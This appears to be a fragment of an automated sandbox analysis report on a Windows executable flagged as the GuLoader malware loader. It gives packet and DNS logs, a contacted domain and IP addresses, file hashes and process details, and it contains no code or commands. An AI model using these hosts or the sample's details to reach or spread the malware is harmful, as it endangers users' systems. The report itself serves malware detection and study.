              Mar 17, 2023 20:49:56.371956110 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.372016907 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.372036934 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.372117996 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.372208118 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.412204027 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.412328959 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.412415981 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.412473917 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.412476063 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.412564039 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.412564039 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.412612915 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.412628889 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.412705898 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.412827969 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.412878990 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.412889004 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413043976 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.413098097 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413125992 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.413213015 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413269043 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.413285971 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413413048 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413433075 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.413538933 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.413583994 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413606882 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.413690090 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.413727045 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413727999 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413754940 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.413826942 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.413834095 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413887024 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413969040 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.413974047 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.414127111 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.414132118 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.414268970 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.414275885 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.414421082 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.414427996 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.414493084 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.414573908 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.414619923 CET4981780192.168.11.2085.95.248.49

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Mar 17, 2023 20:49:56.174714088 CET5447553192.168.11.209.9.9.9
              Mar 17, 2023 20:49:56.236529112 CET53544759.9.9.9192.168.11.20

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Mar 17, 2023 20:49:56.174714088 CET192.168.11.209.9.9.90xc6f2Standard query (0)ruhsalgelisim.comA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Mar 17, 2023 20:49:56.236529112 CET9.9.9.9192.168.11.200xc6f2No error (0)ruhsalgelisim.com85.95.248.49A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • ruhsalgelisim.com
              • 185.246.220.85

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:1
              Start time:20:49:22
              Start date:17/03/2023
              Path:C:\Users\user\Desktop\o6OaOfrAQs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\o6OaOfrAQs.exe
              Imagebase:0x400000
              File size:335976 bytes
              MD5 hash:049ECAD4587538C292E3EBEEE5947EB5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.4873071383.000000000358C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low

              General

              Target ID:4
              Start time:20:49:43
              Start date:17/03/2023
              Path:C:\Users\user\Desktop\o6OaOfrAQs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\o6OaOfrAQs.exe
              Imagebase:0x400000
              File size:335976 bytes
              MD5 hash:049ECAD4587538C292E3EBEEE5947EB5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Target ID:7
              Start time:20:49:58
              Start date:17/03/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204
              Imagebase:0x870000
              File size:482640 bytes
              MD5 hash:40A149513D721F096DDF50C04DA2F01F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate

              Disassembly

              No disassembly